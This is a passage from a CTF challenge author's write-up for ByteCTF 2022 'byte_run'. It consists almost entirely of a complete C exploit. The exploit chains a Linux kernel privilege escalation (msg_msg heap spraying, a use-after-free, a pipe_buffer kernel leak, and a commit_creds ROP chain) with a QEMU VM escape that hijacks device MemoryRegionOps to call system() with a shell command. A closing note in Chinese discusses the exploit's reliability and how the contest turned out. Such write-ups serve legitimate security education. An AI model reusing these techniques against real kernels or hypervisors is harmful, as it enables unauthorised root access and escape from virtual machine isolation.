write(socket_fd[0], fake_data, BYTEDEV_BUF_SIZE - 320);

/* make an OOB write */
puts("[*] OOB write to nearby object...");
write(dev_fd, trash_data, 1);

/* to prevent the memory leaking */
free(trash_data);
free(fake_data);
}

/**
 * Stage II: VM escape through the emulated block device, run as root.
 *
 * Uses the negative-sector OOB to (1) leak glibc from the GHashTable
 * pointers in front of blk_mem[], (2) leak the device state address
 * via its MemoryRegions, (3) stage a ROP chain in the unused parts of
 * the device struct, and (4) swing pmio.ops to a fake
 * MemoryRegionOps so the next PMIO access pivots into system().
 *
 * All the negative sector numbers below are offsets measured on the
 * challenge binary (Ubuntu 22.04 glibc 2.35-0ubuntu3.1); they do not
 * transfer to other builds.
 * NOTE(review): `ret` is declared but never used.
 */
void qemuEscape(void)
{
int dev_fd, ret;
uint64_t buf[BYTEDEV_SECTOR_SIZE / sizeof(uint64_t)];
uint64_t fake_ops[BYTEDEV_SECTOR_SIZE / sizeof(uint64_t)];
uint64_t libc_base, opaque, byte_dev_pmio_read;

if ((dev_fd = open("/dev/bytedev", O_RDWR)) < 0) {
errExit("failed to open bytedev!");
}

/* requires root: switch the module into block mode */
ioctl(dev_fd, BYTEDEV_MODE_CHANGE, BYTEDEV_MODE_BLK);

/**
* SECTOR -23: container
* XXX: in docker-built Ubuntu 22.04, we cannot leak libc there.
* [55] g_str_hash
* [56] g_str_equal
* SECTOR -24: BYTEPCIDevState
* [27~34] name
* [35~] io_regions[PCI_NUM_REGIONS]
* SECTOR -25: byte_dev_pmio_ops
* [0] byte_dev_pmio_read
* [1] byte_dev_pmio_write
* SECTOR -355 &io_regions[PCI_NUM_REGIONS]
* SECTOR -352 MemoryRegion - mmio
* [4] opaque
* [9] ops
* SECTOR -347 MemoryRegion - pmio
* [4] opaque
* [9] ops
* SECTOR -388
* [8] <g_str_hash>
*/

/**
* Step.I leak basic info
*/

puts("");
puts("\033[34m\033[1m[*] Step.I leak basic\033[0m");

puts("\033[34m\033[1m[*] Reading from -388 sector...\033[0m");

ioctl(dev_fd, BYTEDEV_BLK_IDX_CHANGE, -388);
read(dev_fd, buf, BYTEDEV_SECTOR_SIZE);

/* a userland pointer below 0x7f0000000000 means the leak missed */
if (buf[7] < 0x7f0000000000) {
for (int i = 0; i < BYTEDEV_SECTOR_SIZE / sizeof(uint64_t); i++) {
printf("[--data-dump--][%d] %lx\n", i, buf[i]);
}
errExit("failed to leak libc related ptr!");
}

/* This's the offset on the Ubuntu 22.04: GLIBC 2.35-0ubuntu3.1 */
libc_base = buf[7] - 0x3ea410;

printf("\033[32m\033[1m[+] Got libc_base: \033[0m%lx\n", libc_base);

puts("\033[34m\033[1m[*] Reading from -25 sector...\033[0m");

/* copy the genuine pmio ops table so the fake one stays functional */
ioctl(dev_fd, BYTEDEV_BLK_IDX_CHANGE, -25);
read(dev_fd, fake_ops, BYTEDEV_SECTOR_SIZE);
byte_dev_pmio_read = fake_ops[0];
printf("\033[32m\033[1m[+] Got byte_dev_pmio_read: \033[0m%lx\n",
byte_dev_pmio_read);

puts("\033[34m\033[1m[*] Reading from -347 sector...\033[0m");
ioctl(dev_fd, BYTEDEV_BLK_IDX_CHANGE, -347);
read(dev_fd, buf, 10 * sizeof(uint64_t));
opaque = buf[4];
printf("\033[32m\033[1m[+] Got opaque: \033[0m%lx\n", opaque);

/**
* Step.II construct fake pmio->ops
* There we make the opaque.parent_obj.name the ops,
* so that nothing will be effects
*/

puts("");
puts("\033[34m\033[1m[*] Step.II construct fake pmio->ops\033[0m");

ioctl(dev_fd, BYTEDEV_BLK_IDX_CHANGE, -24);
read(dev_fd, buf, BYTEDEV_SECTOR_SIZE);

/* shell command placed inside the device struct itself */
buf[33] = buf[34] = 0;
strcpy((char*)&buf[33], "ls;cat ./flag;gnome-calculator;/bin/sh");

/* the new rdx starts there */
buf[28] = libc_base + LIBC_POP_RDI_RET;
buf[29] = opaque + 33 * 8;//libc_base + LIBC_BIN_SH;
buf[30] = libc_base + LIBC_SYSTEM;
//buf[31] =
/**
* [rdx + 20]
* mov rsp, rdx ; ret
*/
buf[32] = libc_base + LIBC_MOV_RSP_RDX_RET;

/* the [rdi + 8] */
buf[1] = opaque + 28 * 8;

/* fake ops on bar space */
for (int i = 0; i < 10; i++) {
buf[50 + i] = fake_ops[i];
}
/**
* mov rdx, qword ptr [rdi + 8] ; -> store the ptr in opaque[1]
* mov qword ptr [rsp], rax ;
* call qword ptr [rdx + 0x20] -> another call
*/
buf[51] =
libc_base + LIBC_MOV_RDX_PTRRDIADD8_MOV_PTRRSP_RAX_CALL_PTRRDXADD0x20;

write(dev_fd, buf, BYTEDEV_SECTOR_SIZE);

puts("\033[32m\033[1m[+] Done!\033[0m");

/**
* Step.III change pmio->ops to fake ops on opaque
*/

puts("");
puts("\033[34m\033[1m[*] Step.III change pmio->ops to fake ops\033[0m");

ioctl(dev_fd, BYTEDEV_BLK_IDX_CHANGE, -347);
read(dev_fd, buf, 10 * sizeof(uint64_t));

/* MemoryRegion.ops now points at the fake table inside the device */
buf[9] = opaque + 50 * 8;
write(dev_fd, buf, 10 * sizeof(uint64_t));

puts("\033[32m\033[1m[+] Done!\033[0m");

/**
* Step.IV trigger fake pmio->ops.read to escape
* There we need to set opaque[1] to opaque.parent_obj.name
* and do something wonderful there...
*/

puts("");
puts("\033[34m\033[1m[*] Step.IV trigger fake ops to escape\n\033[0m");

//sleep(5);
/* any PMIO access now dispatches through the hijacked ops table */
ioctl(dev_fd, BYTEDEV_MODE_CHANGE, *(size_t*)"arttnba3");
}

/**
 * Landing point after the kernel ROP's iretq returns to userland.
 * Verifies we really are root, runs the stage-II QEMU escape, then
 * drops into an interactive root shell inside the guest.
 *
 * Fixed user-facing message typos: "Succesfully" -> "Successfully",
 * "trigerring" -> "triggering".
 */
void getRootShell(void)
{
    if (getuid()) {
        errExit("failed to gain the root!");
    }

    puts("\033[32m\033[1m[+] Successfully gain the root privilege\033[0m");

    puts("\033[34m\033[1m\n[*] Now we come to Stage II - QEMU ESCAPE\033[0m\n");
    qemuEscape();

    puts("\033[32m\033[1m[+] triggering root shell now...\033[0m\n");
    system("/bin/sh");
    exit(EXIT_SUCCESS);
}

/**
 * Stage I: LPE via the bytedev stream-mode bugs.
 * Pipeline: spray msg_msg -> OOB write corrupts a secondary msg_msg's
 * m_ts -> OOB/arbitrary read via forged sk_buff-backed msg_msg ->
 * leak slab addresses -> reclaim UAF slot with pipe_buffer -> leak
 * kernel base from anon_pipe_buf_ops -> hijack pipe ops with a
 * kernel ROP chain that commits init_cred and irets to getRootShell().
 * Heap-spray ordering below is deliberate; do not reorder.
 */
int main(int argc, char **argv, char **envp)
{
int oob_socket[2];
int sk_sockets[SOCKET_NUM][2];
int pipe_fd[PIPE_NUM][2];
int msqid[MSG_QUEUE_NUM];
int victim_qid, real_qid;
struct msg_msg *nearby_msg;
struct msg_msg *nearby_msg_prim;
struct pipe_buffer *pipe_buf_ptr;
struct pipe_buf_operations *ops_ptr;
uint64_t victim_addr;
uint64_t kernel_base;
uint64_t kernel_offset;
uint64_t *rop_chain;
int rop_idx;
cpu_set_t cpu_set;
int dev_fd;
int ret;

/**
* Step.0
* Initialization
*/
puts("\033[32m\033[1m\n[+] ByteCTF 2022 - ByteRun - exploit \033[0m\n");
puts("\033[34m\033[1m\n[*] Stage I - ROOT Privilege Escalation. \033[0m\n");

/* basic resources alloc */
saveStatus();

if ((dev_fd = open("/dev/bytedev", O_RDWR)) < 0) {
errExit("failed to open bytedev!");
}

if (socketpair(AF_UNIX, SOCK_STREAM, 0, oob_socket) < 0) {
errExit("failed to create socket pair for OOB write!");
}

/* to run the exp on the specific core only */
/* (slab freelists are per-CPU; pinning keeps the sprays coherent) */
CPU_ZERO(&cpu_set);
CPU_SET(0, &cpu_set);
sched_setaffinity(getpid(), sizeof(cpu_set), &cpu_set);

/* socket pairs to spray sk_buff */
for (int i = 0; i < SOCKET_NUM; i++) {
if (socketpair(AF_UNIX, SOCK_STREAM, 0, sk_sockets[i]) < 0) {
errExit("failed to create socket pair!");
}
}

/**
* Step.I
* build msg_queue, spray primary and secondary msg_msg,
* and use OOB write to construct the overlapping
*/
puts("");
puts("\033[34m\033[1m[*] Step.I spray msg_msg for overlapping obj\033[0m");

puts("[*] Build message queue...");
/* build 4096 message queue */
for (int i = 0; i < MSG_QUEUE_NUM; i++) {
if ((msqid[i] = msgget(IPC_PRIVATE, 0666 | IPC_CREAT)) < 0) {
errExit("failed to create msg_queue!");
}
}

puts("[*] Spray primary and secondary msg_msg...");

memset(&primary_msg, 0, sizeof(primary_msg));
memset(&secondary_msg, 0, sizeof(secondary_msg));

/* spray primary and secondary message */
/* each message is tagged with its queue index for later identification */
for (int i = 0; i < MSG_QUEUE_NUM; i++) {
*(int *)&primary_msg.mtext[0] = MSG_TAG;
*(int *)&primary_msg.mtext[4] = i;

ret = writeMsg(msqid[i],
&primary_msg,
sizeof(primary_msg),
PRIMARY_MSG_TYPE);
if (ret < 0) {
errExit("failed to send primary msg!");
}

*(int *)&secondary_msg.mtext[0] = MSG_TAG;
*(int *)&secondary_msg.mtext[4] = i;

ret = writeMsg(msqid[i],
&secondary_msg,
sizeof(secondary_msg),
SECONDARY_MSG_TYPE);
if (ret < 0) {
errExit("failed to send secondary msg!");
}
}

/* create hole in primary msg_msg */
puts("[*] Create holes in primary msg_msg...");
for (int i = 0; i < MSG_QUEUE_NUM; i += 1024) {
ret = readMsg(msqid[i],
&primary_msg,
sizeof(primary_msg),
PRIMARY_MSG_TYPE);
if (ret < 0) {
errExit("failed to receive primary msg!");
}
}

/* triger off-by-null on primary msg_msg */
puts("[*] Trigger OOB write to construct the overlapping...");
trigerOutOfBoundWrite(dev_fd, oob_socket);

/* find the queues that have the same secondary msg_msg */
puts("[*] Checking whether succeeded to make overlapping...");
victim_qid = real_qid = -1;
for (int i = 0; i < MSG_QUEUE_NUM; i++) {
/* the hole */
/*
 * NOTE(review): holes above were punched every 1024 queues, but
 * this skips every multiple of 256 -- presumably a harmless
 * leftover (it only over-skips some valid queues); confirm.
 */
if ((i % 256) == 0) {
continue;
}

if (peekMsg(msqid[i], &secondary_msg, sizeof(secondary_msg), 1) < 0) {
printf("[x] error qid: %d\n", i);
errExit("failed to receive secondary msg!");
}

if (*(int*) &secondary_msg.mtext[0] != MSG_TAG) {
errExit("failed to make corruption!");
}

/* tag mismatch => two queues now share one secondary msg_msg */
if (*(int*) &secondary_msg.mtext[4] != i) {
victim_qid = i;
real_qid = *(int*) &secondary_msg.mtext[4];
break;
}
}

if (victim_qid < 0) {
errExit("failed to make overlapping!");
}

printf("\033[32m\033[1m[+] victim qid:\033[0m %d ", victim_qid);
printf("\033[32m\033[1m real qid: \033[0m %d\n", real_qid);

/**
* Step.II
* construct UAF
*/
puts("\n\033[34m\033[1m[*] Step.II construct UAF\033[0m");

/* free the victim secondary msg_msg, then we get a UAF */
ret = readMsg(msqid[real_qid],
&secondary_msg,
sizeof(secondary_msg),
SECONDARY_MSG_TYPE);
if (ret < 0) {
errExit("failed to receive secondary msg!");
}

puts("\033[32m\033[1m[+] UAF construction complete!\033[0m");

/**
* Step.III
* spray sk_buff to leak msg_msg addr
* construct fake msg_msg to leak addr of UAF obj
*/
puts("");
puts("\033[34m\033[1m[*] Step.III spray sk_buff to leak kheap addr\033[0m");

/* spray sk_buff to construct fake msg_msg */
/* oversized m_ts turns the next peek into an OOB read */
puts("[*] spray sk_buff...");
buildMsg((struct msg_msg *)fake_second_msg,
*(uint64_t*)"arttnba3", *(uint64_t*)"arttnba3",
VICTIM_MSG_TYPE, 0x1000 - sizeof(struct msg_msg),
0, 0);
ret = spraySkBuff(sk_sockets, fake_second_msg, sizeof(fake_second_msg));
if (ret < 0) {
errExit("failed to spray sk_buff!");
}

/* use fake msg_msg to read OOB */
puts("[*] OOB read from victim msg_msg");
if (peekMsg(msqid[victim_qid], &oob_msg, sizeof(oob_msg), 1) < 0)
errExit("failed to read victim msg!");

if (*(int *)&oob_msg.mtext[SECONDARY_MSG_SIZE] != MSG_TAG) {
errExit("failed to rehit the UAF object!");
}

nearby_msg = (struct msg_msg*)
&oob_msg.mtext[(SECONDARY_MSG_SIZE) - sizeof(struct msg_msg)];

printf("\033[32m\033[1m[+] addr of primary msg of msg nearby victim: ");
printf("\033[0m%lx\n", nearby_msg->m_list.prev);

/**
* release and re-spray sk_buff to construct fake msg_msg
* so that we can make an arbitrary read on a primary msg_msg
*/
if (freeSkBuff(sk_sockets, fake_second_msg, sizeof(fake_second_msg)) < 0) {
errExit("failed to release sk_buff!");
}

/* fake segment ptr (next) points at the leaked primary msg_msg */
buildMsg((struct msg_msg *)fake_second_msg,
*(uint64_t*)"arttnba3", *(uint64_t*)"arttnba3",
VICTIM_MSG_TYPE, sizeof(oob_msg.mtext),
nearby_msg->m_list.prev - 8, 0);
if (spraySkBuff(sk_sockets, fake_second_msg, sizeof(fake_second_msg)) < 0) {
errExit("failed to spray sk_buff!");
}

puts("[*] arbitrary read on primary msg of msg nearby victim");
if (peekMsg(msqid[victim_qid], &oob_msg, sizeof(oob_msg), 1) < 0) {
errExit("failed to read victim msg!");
}

if (*(int *)&oob_msg.mtext[0x1000] != MSG_TAG) {
errExit("failed to rehit the UAF object!");
}

/* cal the addr of UAF obj by the header we just read out */
nearby_msg_prim = (struct msg_msg*)
&oob_msg.mtext[0x1000 - sizeof(struct msg_msg)];
victim_addr = nearby_msg_prim->m_list.next - 0x400;

printf("\033[32m\033[1m[+] addr of msg next to victim: \033[0m%lx\n",
nearby_msg_prim->m_list.next);
printf("\033[32m\033[1m[+] addr of msg UAF object: \033[0m%lx\n",
victim_addr);

/**
* Step.IV
* fix the header of UAF obj and release it
* spray pipe_buffer and leak the kernel base
*/
puts("");
puts("\033[34m\033[1m[*] Step.IV spray pipe_buffer to leak kbase\033[0m");

/* re-construct the msg_msg to fix it */
puts("[*] fixing the UAF obj as a msg_msg...");
if (freeSkBuff(sk_sockets, fake_second_msg, sizeof(fake_second_msg)) < 0) {
errExit("failed to release sk_buff!");
}

/**
* XXX: we need to pass the check in lib/list_debug.c
* what we used to not to pass there is
* "prev->next == entry" && "next->prev == entry"
* so a valid memory with [addr of entry] should be set there
*/
memset(fake_second_msg, 0, sizeof(fake_second_msg));
for (int i = 0; i < 0x50; i++) {
((size_t*)(fake_second_msg))[i] = victim_addr;
}
buildMsg((struct msg_msg *)fake_second_msg,
victim_addr + 0x100, victim_addr + 0x100,
VICTIM_MSG_TYPE, SECONDARY_MSG_SIZE - sizeof(struct msg_msg),
0, 0);
if (spraySkBuff(sk_sockets, fake_second_msg, sizeof(fake_second_msg)) < 0) {
errExit("failed to spray sk_buff!");
}

/* release UAF obj as secondary msg */
puts("[*] release UAF obj in message queue...");
ret = readMsg(msqid[victim_qid],
&secondary_msg,
sizeof(secondary_msg),
VICTIM_MSG_TYPE);
if (ret < 0) {
errExit("failed to receive secondary msg!");
}

/* spray pipe_buffer */
puts("[*] spray pipe_buffer...");
for (int i = 0; i < PIPE_NUM; i++) {
if (pipe(pipe_fd[i]) < 0) {
errExit("failed to create pipe!");
}

/* write something to activate the pipe */
if (write(pipe_fd[i][1], "arttnba3", 8) < 0) {
errExit("failed to write the pipe!");
}
}

/* release the sk_buff to read pipe_buffer, leak kernel base */
puts("[*] release sk_buff to read pipe_buffer...");
pipe_buf_ptr = (struct pipe_buffer *) &fake_second_msg;
for (int i = 0; i < SOCKET_NUM; i++) {
for (int j = 0; j < SK_BUFF_NUM; j++) {
ret = read(sk_sockets[i][1],
&fake_second_msg,
sizeof(fake_second_msg));
if (ret < 0) {
errExit("failed to release sk_buff!");
}

if (pipe_buf_ptr->ops > 0xffffffff81000000) {
printf("\033[32m\033[1m[+] got anon_pipe_buf_ops:\033[0m%lx\n",
pipe_buf_ptr->ops);
kernel_offset = pipe_buf_ptr->ops - ANON_PIPE_BUF_OPS;
kernel_base = 0xffffffff81000000 + kernel_offset;
}
}
}

/*
 * NOTE(review): if no sk_buff ever held a pipe_buffer,
 * kernel_base/kernel_offset are used uninitialized below.
 */
printf("\033[32m\033[1m[+] kernel base: \033[0m%lx ", kernel_base);
printf("\033[32m\033[1moffset: \033[0m%lx\n", kernel_offset);

/**
* Step.V
* hijack the ops of pipe_buffer
* free all pipe to trigger fake ptr
* so that we hijack the RIP
* construct a ROP on pipe_buffer
*/
puts("");
puts("\033[34m\033[1m[*] Step.V hijack the ops of pipe to root\033[0m");

puts("[*] pre-construct data in userspace...");
pipe_buf_ptr = (struct pipe_buffer *) fake_second_msg;
pipe_buf_ptr->ops = victim_addr;

ops_ptr = (struct pipe_buf_operations *) fake_second_msg;
/* push rsi ; pop rsp ; pop rbx ; pop r12 ; ret */
ops_ptr->release = 0xffffffff8133151b + kernel_offset;
/* ret */
ops_ptr->get = 0xffffffff81331534 + kernel_offset;

/* ROP: commit_creds(&init_cred) then swapgs+iretq to getRootShell() */
rop_idx = 0;
rop_chain = (uint64_t*) &fake_second_msg[0x20];
rop_chain[rop_idx++] = kernel_offset + POP_RDI_RET;
rop_chain[rop_idx++] = kernel_offset + INIT_CRED;
rop_chain[rop_idx++] = kernel_offset + COMMIT_CREDS;
rop_chain[rop_idx++] = \
kernel_offset + SWAPGS_RESTORE_REGS_AND_RETURN_TO_USERMODE;
rop_chain[rop_idx++] = *(uint64_t*) "arttnba3";
rop_chain[rop_idx++] = *(uint64_t*) "arttnba3";
rop_chain[rop_idx++] = (size_t) getRootShell;
rop_chain[rop_idx++] = user_cs;
rop_chain[rop_idx++] = user_rflags;
rop_chain[rop_idx++] = user_sp;
rop_chain[rop_idx++] = user_ss;

puts("[*] spray sk_buff to hijack pipe_buffer...");
if (spraySkBuff(sk_sockets, fake_second_msg, sizeof(fake_second_msg)) < 0) {
errExit("failed to spray sk_buff!");
}

puts("[*] trigger fake ops->release to hijack RIP...");
//sleep(5);
for (int i = 0; i < PIPE_NUM; i++) {
close(pipe_fd[i][0]);
close(pipe_fd[i][1]);
}

return 0;
}

由于堆喷的不稳定性,在第一阶段还是有可能会挂掉的,因此这道题目其实还是需要爆破的一道题目,几率 1/16:

img.jpg

0x03.解题情况

这道题笔者最初出题的时候是按照签到题的难度出的,因为这道题的两个阶段:阶段一的 kernel UAF 其实是可以直接使用通解完成解题的,而阶段二的 QEMU 逃逸则是一个非常直白的越界读写漏洞,利用起来也不算困难。

但最后并没有队伍解开这道题,可能是因为大家觉得笔者的题目太简单了都不屑于做吧(笑)


【CTF.0x07】ByteCTF2022 byte_run 出题手记
https://arttnba3.github.io/2022/09/30/CTF-0X07-BYTECTF2022_BYTERUN/
作者
arttnba3
发布于
2022年9月30日
许可协议